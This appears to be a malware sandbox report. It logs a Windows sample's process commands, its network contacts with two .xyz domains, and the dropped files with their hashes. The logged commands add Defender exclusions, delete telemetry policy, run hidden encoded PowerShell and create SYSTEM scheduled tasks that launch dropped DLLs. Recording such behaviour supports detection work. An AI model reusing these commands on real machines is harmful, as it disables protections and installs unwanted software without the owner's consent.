"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\biwNYXhGTKCQxjLv /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "geqrlYoLs" /SC once /ST 07:03:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "geqrlYoLs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "geqrlYoLs"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FTlmQXMDCFpnewAuq" /SC once /ST 05:15:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe\" VS /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "FTlmQXMDCFpnewAuq"

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe

C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\rznVBFO.exe VS /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bJbhxhmwQPPePEjnjA"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\oWxSecJNU\WNgxMz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zeLHdclAQOoTZxj" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "zeLHdclAQOoTZxj2" /F /xml "C:\Program Files (x86)\oWxSecJNU\aYvhmsh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "zeLHdclAQOoTZxj"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KJMKKiIztyaoEB" /F /xml "C:\Program Files (x86)\YNUWFfCEdUiU2\ICzrjSr.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xicirzYkCmkIU2" /F /xml "C:\ProgramData\eiYaNjTCbhfbMeVB\pKVBzLj.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "LUmQQZwnOYWgZobiD2" /F /xml "C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\phinBxB.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IkWUsEdSKunoejOLGpU2" /F /xml "C:\Program Files (x86)\LsajhStaXkJRC\sCwzdYP.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "dBpreMcpfXbehynYz" /SC once /ST 00:14:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "dBpreMcpfXbehynYz"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "FTlmQXMDCFpnewAuq"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "dBpreMcpfXbehynYz"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 r10.o.lencr.org udp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 8.8.8.8:53 addons.mozilla.org udp
US 151.101.65.91:80 addons.mozilla.org tcp
US 151.101.65.91:443 addons.mozilla.org tcp
US 8.8.8.8:53 91.65.101.151.in-addr.arpa udp
US 8.8.8.8:53 75.210.23.2.in-addr.arpa udp
US 151.101.65.91:80 addons.mozilla.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 api4.check-data.xyz udp
US 35.162.118.53:80 api4.check-data.xyz tcp
US 8.8.8.8:53 53.118.162.35.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS91C0.tmp\Install.exe

MD5 3b76af9e2510171d3739b8bc9ee2ee68
SHA1 4c8148a587ba7e6de8963c2d4dbbcceac39b3694
SHA256 3c888be794010977e28034fd484ed7363ff6c52dfe6c8449acbe6cce4e637768
SHA512 d9736ae8439c7d809cdd299423f8ac04f6301c4eb3c1997fa217b4e8cd77174f795d1632b23f6e8a93eb6c96b998a8258f2366b3d701a7a2b944cab83a3a8d94

C:\Users\Admin\AppData\Local\Temp\7zS93B4.tmp\Install.exe

MD5 ad10a30760d467dade24f430b558b465
SHA1 7aaa56e80264c27d080c3b77055294593eacca1b
SHA256 44c717fd08281b16f266bd9bc037fc16713a8ac02e1dfe519ba3be49bac8442a
SHA512 23c13f8c865da24d848b2843b67190188048e7383dcb2dff10f8e8e94862a8ae1916aef3566cd2ce4346c816f7e8301912a9fff4a04bb5380b75b98bd7154e63

memory/1620-13-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/3172-17-0x0000027079D00000-0x0000027079D22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mcq14fbq.ugh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1148-33-0x0000000010000000-0x0000000010F04000-memory.dmp

memory/2028-35-0x0000000003EA0000-0x0000000003ED6000-memory.dmp

memory/2028-36-0x00000000045D0000-0x0000000004BF8000-memory.dmp

memory/2028-37-0x0000000004C00000-0x0000000004C22000-memory.dmp

memory/2028-38-0x0000000004CE0000-0x0000000004D46000-memory.dmp

memory/2028-44-0x0000000004E00000-0x0000000004E66000-memory.dmp

memory/2028-49-0x00000000050A0000-0x00000000053F4000-memory.dmp

memory/2028-50-0x0000000005460000-0x000000000547E000-memory.dmp

memory/2028-51-0x00000000054B0000-0x00000000054FC000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c1834583f870c6afc6780e6354eace4a
SHA1 34b1016f92a60787b2502e18b5e9ce0c9b5a1e00
SHA256 2c28d41cb82bb55fafaa17e9ccb70a315028478c632103c28615822a98a4b80c
SHA512 a1c2681b1deb96fc3416e35fe0b959b3e8befbef82f80f782ec0d074ee6786b93b8563be0fbabbf983e9b33d0ee5584896af0f61de0339e0a6e9d558dadeadef

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/3252-98-0x0000000003D40000-0x0000000003DC5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 2393845e99ffd3c7af749b7d7f150010
SHA1 71f915826a0a2e25c5849bc869389a95ada40867
SHA256 417a30f924cee5a7400abd91bf3e450317a76b04f333ba47174fbdf713af0edd
SHA512 ae336616b45c75bc78806ff95c95485b2a0bce6c7e1b04985092e7aeb2d3adf6d546bb32de1af67ab596038ae2249331a77e31ccb1339b4a4340dd33bd31d2a2

memory/3252-144-0x0000000004500000-0x000000000456B000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 10379cf6c154cf03d8d7e4ff25288e3d
SHA1 eff5c4511e9e22760a332700bd3dc4cf824b07c5
SHA256 85cfddbb1317c3ad1cb93a862763b15be729841081aa8e6bc5a0e2e39325e98c
SHA512 f8c424a0121d564c5def9cbcbbdc9f2582be73e7181964bc40d96c57e0f9adb7316ae65d3baecaae36129266026133c5fc1629182b031b6f6cfefe1d65947b47

C:\Program Files (x86)\oWxSecJNU\aYvhmsh.xml

MD5 3729cf440240e5651448465e4a5ee5b1
SHA1 9fe90c1f9cb98beca1e528f10350b09a1d18cd97
SHA256 e6c7232f7f94fb07b1bc7f4f8b35d2ce812cf6b482744409fe4d3edb0e47d3a7
SHA512 3b8fd569613efb57ee6c53d7e03d254d979730f91ca92fb8388c3c640e2ec3537fd772c119e0c70fbd9a9d86c662ab4725dcc5fc6093876e3c8cf672397f448d

C:\Program Files (x86)\YNUWFfCEdUiU2\ICzrjSr.xml

MD5 285afe329a58bd74b17fd3abaebbfc9f
SHA1 7d630d333e36ffe9935d7df9d34b558783964bcd
SHA256 0d942f45f9782faa2dedc72b114bbd33187d91563d86894df9a5cf7b9ce8e119
SHA512 39358742de691dc2c200ecfc5cbb6066a815dff8afcf6ee5cad056ba1dbfd83983588d6cc4923b36325c40036e3b977ea5b301940f707cad15c55ebb7f65d440

C:\ProgramData\eiYaNjTCbhfbMeVB\pKVBzLj.xml

MD5 dc1d9db021f503f6a7d51465cf5d1605
SHA1 a8a658feb696a11c7809e411cb9e3c485285cb5a
SHA256 9e74d17ebd78eaa2ec7cab23a5ec057f85ed1a072ae8a7a9d4e224361bb9ec78
SHA512 471835d6932a486d82d5ad5f1d35f7faa3afa7515923e502add39927da42f647a36ec4942e9e0d2798553533e19c3cf6649492565287251e0a8852a47e36ff92

C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\phinBxB.xml

MD5 bf23352b70c2c8635aec6774ab5c8d5e
SHA1 ef8a0cac3c0b24516e28371630499a7cc823addf
SHA256 9067890693621d2cdb1b208e7220c29704c6304b63bef00251cb3530687d163c
SHA512 b3398222c9802e621667725d3b170ab65ed2fcc8bc5c43b24da89ac087b04453c479d0b7e77f5fdd43380972ec5ff17b0bf7c5973ee075a92d5893d3cb21e799

C:\Program Files (x86)\LsajhStaXkJRC\sCwzdYP.xml

MD5 ad253ba04775950f6e1e753962ba3e20
SHA1 32f1d4da60ce18371d6ca2d643ae3b8c0357d4c8
SHA256 329306ac902603235beaf115692932604f888fc81bc5eef77dffb64881879cda
SHA512 1d5d8821d941910f2e594c28bea5f78e3b1e0d8f4ea56430a7d195701bcd38fffdd540cd730ec99919ea9deb13a8607844bff5dd04257be3e386aa6c2eed8cdb

C:\Windows\Temp\biwNYXhGTKCQxjLv\VzDElSCr\XTWXPmA.dll

MD5 617698f01c7cceb3b262a98ba4da5a98
SHA1 c9244abc65ab3c485cc197ddea5e846b65d14bad
SHA256 9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754
SHA512 3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

memory/3252-323-0x0000000004E10000-0x0000000004ECD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7fmsgkth.default-release\prefs.js

MD5 861505b9c18f179453a2793067151fa3
SHA1 e8d11463d0e7ca1c636de2cee5350f00d6b55786
SHA256 7e233126e1242e11d0b463c5625ec9fa0e8eee7fea80ea605aeeeaf944ff43d4
SHA512 a3e8a9c5548cfdbba211965dbf8553a88a8001c34e9bd7d2b33ef28a0a1357f0483297965fae1ad34bb3a71822a23bc7e3743443a890791cfca925dad961f4a3

memory/3252-313-0x0000000004D90000-0x0000000004E03000-memory.dmp

memory/2028-346-0x0000000001BB0000-0x0000000002AB4000-memory.dmp